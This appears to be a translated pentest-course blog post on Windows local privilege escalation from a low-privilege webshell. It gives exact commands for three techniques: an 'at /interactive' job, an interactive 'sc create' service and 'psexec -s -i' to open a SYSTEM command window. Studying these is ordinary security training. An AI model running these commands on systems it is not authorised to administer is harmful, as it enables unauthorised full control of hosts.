Privilege Escalation: Local Privilege Escalation. (AT || SC || PS )

Privilege Escalation: Local privilege escalation.

Privilege escalation is referred to as privilege escalation . Since the operating system is a multi-user operating system , users have permission control . For example, the permissions obtained through Web vulnerabilities are Web process permissions. Often, Web services are started with an account with very low permissions. Therefore, some operations through the Webshell will be restricted, which requires it to be elevated to administrative or even System privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations of the operating system, or through third-party software services, such as database or FTP software vulnerabilities.


Table of contents:

Privilege Escalation: AT || SC || PS Privilege Escalation

AT privilege escalation:

Step 1: Open a command line to add a job.

Step 2: When the time is up, a window with high authority will come out automatically.

SC privilege escalation:

Step 1: Open a command line to create a new service named syscmd

Step 2: Execute this new service, and a window with high authority will come out automatically.

PS Escalation of rights:

Step 1: Download an official Windows tool.

Step 2: Unzip it and place it in the server to be elevated, open the command line and switch to the directory of this file.


Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.


AT privilege escalation:

Step 1: Open a command line to add a job.

at 15:13 /interactive cmd.exe        //这个时间打开一个命令行.


Step 2: When the time is up, a high-privilege window will appear automatically. ( AT privilege escalation can only be used for systems before Win 7 )


SC privilege escalation:

Step 1: Open a command line to create a new service named syscmd

sc Create syscmd binPath= "cmd /K start" type= own type= interact


Step 2: Execute this new service, and a high-privilege window will appear automatically. ( SC privilege escalation can only be used for systems before Win 7 )

sc start syscmd


PS Escalation of rights:

Step 1: Download an official Windows tool.

PsTools - Sysinternals | Microsoft Learn


Step 2: Unzip it and put it in the server where the rights are to be raised, open the command line and switch to the directory of this file. (A new window will open.) PS The rights escalation will also affect the system after Win 7.

psexec.exe -accepteula -s -i -d cmd.exe

     

     

Learning Link: Day 59: Privilege Escalation - Win Overflow Vulnerability and AT&SC&PS Privilege Escalation_哔哩哔哩_bilibili

Guess you like

Origin blog.csdn.net/weixin_54977781/article/details/130376898